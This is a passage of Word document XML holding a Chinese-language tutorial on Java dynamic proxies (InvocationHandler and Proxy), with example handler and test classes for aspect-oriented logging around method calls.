      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvocationHandler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvocationHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是一个接口，通过实现该接口</w:t>
      </w:r>
      <w:r w:rsidRPr="006655AC">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>定义横切逻辑，并通过反射机制调用目标类的代码，动态的将横切逻辑和业务逻辑编织在一起</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvocationHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态创建一个符合某一接口的实例，生成目标类的代理对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如下，我们创建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvocationHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>package testAOP;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>import java.lang.reflect.InvocationHandler;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import java.lang.reflect.Method;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>public class MyInvocationHandler implements InvocationHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:after="38" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>    private Object target;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    MyInvocationHandler(Object target){</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        this.target = target;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    public Object invoke(Object proxy, Method method, Object[] args)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>            throws Throwable {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        //</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标方法前执行</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.println("——————————————————————————");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.println("</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>下一位请登台发言！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        //</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标方法调用</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        Object obj = method.invoke(target, args);</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        //</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标方法后执行</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.println("</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>大家掌声鼓励！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        return obj;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>下面是测试：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:after="38" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>package testAOP;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import java.lang.reflect.Proxy;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public class JDKProxyTest {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    public static void main(String[] args) {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>希望被代理的目标业务类</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        Saying target = new SayingImpl();</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>将目标类和横切类编织在一起</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        MyInvocationHandler handler = new MyInvocationHandler(target);</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>创建代理实例</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        Saying proxy = (Saying) Proxy.newProxyInstance(</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                target.getClass().getClassLoader(),//</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标类的类加载器</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                target.getClass().getInterfaces(),//</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标类的接口</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                handler);//</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>横切类</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        proxy.sayHello("</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>小明</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        proxy.talking("</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>小丽</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>运行情况如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
